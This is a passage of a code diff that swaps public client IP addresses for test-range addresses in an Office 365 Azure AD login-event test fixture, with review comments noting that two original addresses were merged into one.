@@ -286,7 +286,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"79.159.10.151\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"79.159.10.151\",\"CreationTime\":\"2020-02-12T10:53:22\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"550af372-cdfd-4286-a1b7-d58df0dcd5d6\",\"InterSystemsId\":\"16e81fcc-add3-46c2-8834-10ce330ffe76\",\"IntraSystemId\":\"2a84e6ff-7340-426e-9d0d-e53092c0c600\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T10:53:22\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"550af372-cdfd-4286-a1b7-d58df0dcd5d6\",\"InterSystemsId\":\"16e81fcc-add3-46c2-8834-10ce330ffe76\",\"IntraSystemId\":\"2a84e6ff-7340-426e-9d0d-e53092c0c600\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -304,10 +304,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "79.159.10.151", + "ActorIpAddress": "67.43.156.13", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "AzureActiveDirectoryEventType": 1, - "ClientIP": "79.159.10.151", + "ClientIP": "67.43.156.13", "CreationTime": "2020-02-12T10:53:22", "ExtendedProperties": [ { 
@@ -357,7 +357,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"213.97.47.133\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"213.97.47.133\",\"CreationTime\":\"2020-02-07T16:43:23\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"b5f59a43-00cf-42c4-8685-a7166fd20e38\",\"InterSystemsId\":\"172703f7-324e-415a-a846-c39ca97eb1c8\",\"IntraSystemId\":\"d66cd29f-596e-4878-b756-92b545d25f00\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-07T16:43:23\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"b5f59a43-00cf-42c4-8685-a7166fd20e38\",\"InterSystemsId\":\"172703f7-324e-415a-a846-c39ca97eb1c8\",\"IntraSystemId\":\"d66cd29f-596e-4878-b756-92b545d25f00\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -375,10 +375,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "213.97.47.133", + "ActorIpAddress": "67.43.156.15", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "AzureActiveDirectoryEventType": 1, - "ClientIP": "213.97.47.133", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-07T16:43:23", "ExtendedProperties": [ { 
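Review bot: The rewrite maps 213.97.47.133 in this hunk (@@ -357) to 67.43.156.15, the same value the first hunk (@@ -2) gave 83.57.233.151, so the fixture now carries two distinct client addresses where the original had three; the same collapse recurs in hunks @@ -428, @@ -499 and @@ -641 and their o365audit counterparts (@@ -375, @@ -446, @@ -517, @@ -659). If the expected output or a test that consumes this fixture groups by the ECS field these values presumably land in (`client.ip`/`source.ip`) or counts `related.ip`, that lost distinction changes the fixture's shape, so giving the 213.97.47.133 events a third address from the same supported set (placeholder `<THIRD_SUPPORTED_TEST_IP>`) would preserve the original one-to-one mapping. Moving real-looking public addresses out of committed test data is the right direction, and the escaped `event.original` string and the parsed `ActorIpAddress`/`ClientIP` fields are updated in lockstep, which the pipeline test needs.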
@@ -428,7 +428,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"213.97.47.133\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"213.97.47.133\",\"CreationTime\":\"2020-02-07T16:43:41\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"32e7fb94-6289-4fb4-855b-2ab78671ca4e\",\"InterSystemsId\":\"17f8756c-0bfa-49ad-8537-ada4e17a5f7d\",\"IntraSystemId\":\"1b395e92-5d02-408f-8bfe-139098a95500\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-07T16:43:41\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"32e7fb94-6289-4fb4-855b-2ab78671ca4e\",\"InterSystemsId\":\"17f8756c-0bfa-49ad-8537-ada4e17a5f7d\",\"IntraSystemId\":\"1b395e92-5d02-408f-8bfe-139098a95500\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -446,10 +446,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "213.97.47.133", + "ActorIpAddress": "67.43.156.15", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "AzureActiveDirectoryEventType": 1, - "ClientIP": "213.97.47.133", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-07T16:43:41", "ExtendedProperties": [ { 
@@ -499,7 +499,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"213.97.47.133\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"213.97.47.133\",\"CreationTime\":\"2020-02-07T16:43:22\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"7314a65a-f383-40fb-a0c7-00c6c4cfabc0\",\"InterSystemsId\":\"22aac168-9d0d-4c70-b94d-adc337ab7b06\",\"IntraSystemId\":\"280b3410-9d51-4ce3-952d-5bba18ea6600\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-07T16:43:22\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"7314a65a-f383-40fb-a0c7-00c6c4cfabc0\",\"InterSystemsId\":\"22aac168-9d0d-4c70-b94d-adc337ab7b06\",\"IntraSystemId\":\"280b3410-9d51-4ce3-952d-5bba18ea6600\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -517,10 +517,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "213.97.47.133", + "ActorIpAddress": "67.43.156.15", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "AzureActiveDirectoryEventType": 1, - "ClientIP": "213.97.47.133", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-07T16:43:22", "ExtendedProperties": [ { 
@@ -570,7 +570,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"79.159.10.151\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"79.159.10.151\",\"CreationTime\":\"2020-02-12T10:52:05\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"97b494ee-9ba1-4444-b052-3459bdc9eaa5\",\"InterSystemsId\":\"23321532-a321-4c97-909d-9489979777d6\",\"IntraSystemId\":\"1909acba-a486-4ffc-805c-09fb73c0bf00\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T10:52:05\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"97b494ee-9ba1-4444-b052-3459bdc9eaa5\",\"InterSystemsId\":\"23321532-a321-4c97-909d-9489979777d6\",\"IntraSystemId\":\"1909acba-a486-4ffc-805c-09fb73c0bf00\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -588,10 +588,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "79.159.10.151", + "ActorIpAddress": "67.43.156.13", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "AzureActiveDirectoryEventType": 1, - "ClientIP": "79.159.10.151", + "ClientIP": "67.43.156.13", "CreationTime": "2020-02-12T10:52:05", "ExtendedProperties": [ { 
@@ -641,7 +641,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"213.97.47.133\",\"ApplicationId\":\"5e3ce6c0-2b1f-4285-8d4b-75ee78787346\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"213.97.47.133\",\"CreationTime\":\"2020-02-07T16:43:45\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"391870e6-1729-40ae-9ebb-51e0652fec9b\",\"InterSystemsId\":\"291fb7ce-4e56-47fd-a78e-4e9012f112ab\",\"IntraSystemId\":\"9d47f3e0-1b2d-4c1c-b47b-dcf4bc4d5700\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"5e3ce6c0-2b1f-4285-8d4b-75ee78787346\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-07T16:43:45\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"391870e6-1729-40ae-9ebb-51e0652fec9b\",\"InterSystemsId\":\"291fb7ce-4e56-47fd-a78e-4e9012f112ab\",\"IntraSystemId\":\"9d47f3e0-1b2d-4c1c-b47b-dcf4bc4d5700\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -659,10 +659,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "213.97.47.133", + "ActorIpAddress": "67.43.156.15", "ApplicationId": "5e3ce6c0-2b1f-4285-8d4b-75ee78787346", "AzureActiveDirectoryEventType": 1, - "ClientIP": "213.97.47.133", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-07T16:43:45", "ExtendedProperties": [ { 
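Review bot: The address substitution is not one-to-one: 213.97.47.133 (this hunk and @@ -925/-943) and 83.57.233.151 (@@ -783/-801, -854/-872, -1067/-1085, -1280/-1298) both become 67.43.156.15, while 79.159.10.151 → 67.43.156.13 and 37.29.234.179 → 67.43.156.14 keep a distinct address each. Within every hunk the escaped `event.original` string and the parsed `o365audit.ActorIpAddress` / `ClientIP` values agree, so the pipeline test stays self-consistent; what is lost is that the fixture no longer separates two sessions that previously came from different client addresses, which matters for anything that counts distinct addresses per user. Consider giving one of the two its own address from the same 67.43.156.x range so the fixture keeps four distinct sources. If this expected file is regenerated from the data stream's input log fixture, the mapping presumably has to be corrected there first and the file regenerated rather than edited by hand.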
@@ -712,7 +712,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"79.159.10.151\",\"ApplicationId\":\"00000002-0000-0ff1-ce00-000000000000\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"79.159.10.151\",\"CreationTime\":\"2020-02-12T10:51:49\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"a7538fb0-3213-41dc-ab38-1aed787e0cdc\",\"InterSystemsId\":\"30e5377b-31d8-42c2-8170-13404afacde7\",\"IntraSystemId\":\"8971516f-3ef3-4de0-b6b8-ebfae386bc00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0ff1-ce00-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0ff1-ce00-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com